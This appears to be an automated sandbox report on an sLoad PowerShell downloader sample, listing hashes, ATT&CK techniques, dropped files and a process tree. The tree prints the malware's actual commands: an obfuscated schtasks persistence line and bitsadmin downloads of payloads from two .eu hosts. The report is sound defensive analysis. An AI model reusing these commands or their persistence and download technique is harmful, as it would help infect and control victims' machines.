sload | 0af312c6ae5a1d708966fb550dcae81f59db5a54421803b40bd8b2752fb7ee89

General

Target

FILE POWERSHELL MALEVOLO.ps1
Size

104KB
MD5

ef3e1a843da4fb31012afe474447c98b
SHA1

0ca2a653b3cc7d8630e2938c18ce5dda91e0b9b7
SHA256

488d775b3e2118b63dfc26020e5e7a3aa95951f78099ce8e203d50b3e1e0c66d
SHA512

149744665463591cea2798f4efd90b7d5b24c763270e8530c40b7520892b67b0f92b0268456eaa5c545a1984cddca45dddb4e0461c72eee0b3f8db9592f1ec55
SSDEEP

3072:ZtW7qBQqhDmaA8Hch3g+XdZQaPU91ajO3vQSo:gqBQqhDmaA8HW3g+XdZQaPU91ajO3vQH

Score

10^/10

sload dropper execution stealer trojan

Malware Config

Signatures

Sload family
sload
sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

4872 bitsadmin.exe
4464 bitsadmin.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.EXE

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.EXE
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3464 powershell.exe
3852 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

4088 schtasks.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

3464 powershell.exe
3464 powershell.exe
3464 powershell.exe
3852 powershell.exe
3852 powershell.exe
3852 powershell.exe
3852 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3464 powershell.exe
Token: SeDebugPrivilege 3852 powershell.exe

pid	process
4872	bitsadmin.exe
4464	bitsadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	wscript.EXE

pid	process
3464	powershell.exe
3852	powershell.exe

pid	process
4088	schtasks.exe

pid	process
3464	powershell.exe
3464	powershell.exe
3464	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

powershell.execmd.exewscript.EXEpowershell.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3464 wrote to memory of 552	3464	powershell.exe	schtasks.exe
PID 3464 wrote to memory of 552	3464	powershell.exe	schtasks.exe
PID 3464 wrote to memory of 1488	3464	powershell.exe	schtasks.exe
PID 3464 wrote to memory of 1488	3464	powershell.exe	schtasks.exe
PID 3464 wrote to memory of 4304	3464	powershell.exe	cmd.exe
PID 3464 wrote to memory of 4304	3464	powershell.exe	cmd.exe
PID 4304 wrote to memory of 4088	4304	cmd.exe	schtasks.exe
PID 4304 wrote to memory of 4088	4304	cmd.exe	schtasks.exe
PID 3348 wrote to memory of 3852	3348	wscript.EXE	powershell.exe
PID 3348 wrote to memory of 3852	3348	wscript.EXE	powershell.exe
PID 3852 wrote to memory of 1592	3852	powershell.exe	getmac.exe
PID 3852 wrote to memory of 1592	3852	powershell.exe	getmac.exe
PID 3852 wrote to memory of 3664	3852	powershell.exe	cmd.exe
PID 3852 wrote to memory of 3664	3852	powershell.exe	cmd.exe
PID 3852 wrote to memory of 4548	3852	powershell.exe	cmd.exe
PID 3852 wrote to memory of 4548	3852	powershell.exe	cmd.exe
PID 3852 wrote to memory of 1368	3852	powershell.exe	cmd.exe
PID 3852 wrote to memory of 1368	3852	powershell.exe	cmd.exe
PID 3664 wrote to memory of 856	3664	cmd.exe	bitsadmin.exe
PID 3664 wrote to memory of 856	3664	cmd.exe	bitsadmin.exe
PID 1368 wrote to memory of 4872	1368	cmd.exe	bitsadmin.exe
PID 1368 wrote to memory of 4872	1368	cmd.exe	bitsadmin.exe
PID 4548 wrote to memory of 4464	4548	cmd.exe	bitsadmin.exe
PID 4548 wrote to memory of 4464	4548	cmd.exe	bitsadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\FILE POWERSHELL MALEVOLO.ps1"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3464
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:552
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /change /tn GoFast /disable
  2⤵
  PID:1488
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0gzhMyNWIs" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\system32\schtasks.exe
    schtasks /F /Create /sc minute /mo 3 /TN "S0gzhMyNWIs" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4088

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file WQkUpeNb.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3852
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:1592
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3664
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer hRAuzxNa /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\0_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer hRAuzxNa /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\0_svchost.log
      4⤵
      Download via BitsAdmin
      PID:4464
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer KJbPvAsU /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\1_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer KJbPvAsU /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\1_svchost.log
      4⤵
      Download via BitsAdmin
      PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0i3551w3.rdl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\users\Admin\AppData\Roaming\gzhMyNWIs\WQkUpeNb.ps1

Filesize
1KB

MD5
9c96f3f560075017255edbe64c3dde87

SHA1
9d14f7cfa180a50eddaa7bffbd01f996df22eaec

SHA256
6f4e8ce8fb4f2cb84c898821781b9a1a6f290a74732e72bb0c6f29c0e2b21d35

SHA512
3f695264b07f033a46e164823220711286951896ee08db51ef9df3c0ab5db4a5a6d0ca87c02c6da7f669088d53c7888c8265b5cae3f991566da078de6d1bf403

Download Submit
C:\users\Admin\AppData\Roaming\gzhMyNWIs\system.ini

Filesize
160KB

MD5
911c95cef0824a684d2479804eb8cf19

SHA1
b72c5d8b9f0eafe0da129feedf162e479a3e1718

SHA256
0d3caf29e9098f00ef0e6f76e9426ed49bdfd8961b6128a3bf3b0274cc6b1c1b

SHA512
bfd8c85700db69c261d0676bfa8199eb3f079c089364ea7f734f85e5fae103347ceb74fc29c23ae59803cc3878298853b8d653fa1d6cac5ed53302b9b03b835a

Download Submit
C:\users\Admin\AppData\Roaming\gzhMyNWIs\win.ini

Filesize
1KB

MD5
f3e4808ac14e8e115363902a0cbbdb6d

SHA1
a984a9abfdae900df5733d3c51627afccbbd5201

SHA256
2e77398371a5d0f40bcc5702220c964ea06595d2af3e166d16e49203ba5d1aaf

SHA512
c79fb71bd3a4b5f62b1d3d50c6da91057510b2ecf4014bf569f4efe80e2d4ff5280aafd538cbf740feacb18802ed14806248bf6178a53cdb325fb93d98f89de0

Download Submit
\??\c:\users\Admin\AppData\Roaming\gzhMyNWIs\WQkUpeNb.tmp

Filesize
1KB

MD5
2dbb8b831ac3e2ddb2a9ab33d6c65902

SHA1
3d100e31185f2cdbcd39e68bbb3343d118e938f7

SHA256
4bb2469553a01718de03515b6b80db6a07cea810a0f24eac4d4ed3bff9426679

SHA512
2a3a9105feecbd60371bee177f615ee8044d04247f835779acaf7a4170e71da9f42b8932f2dd11cf70fc4f52bc013d9110fd0d8740bfe873b23d9dd427a8eeb3

Download Submit
memory/3464-0-0x00007FFC7FDF3000-0x00007FFC7FDF5000-memory.dmp

Filesize
8KB

Download
memory/3464-10-0x0000014AC30D0000-0x0000014AC30F2000-memory.dmp

Filesize
136KB

Download
memory/3464-11-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/3464-12-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/3464-13-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/3464-18-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/3852-31-0x000001CF73DD0000-0x000001CF742F8000-memory.dmp

Filesize
5.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads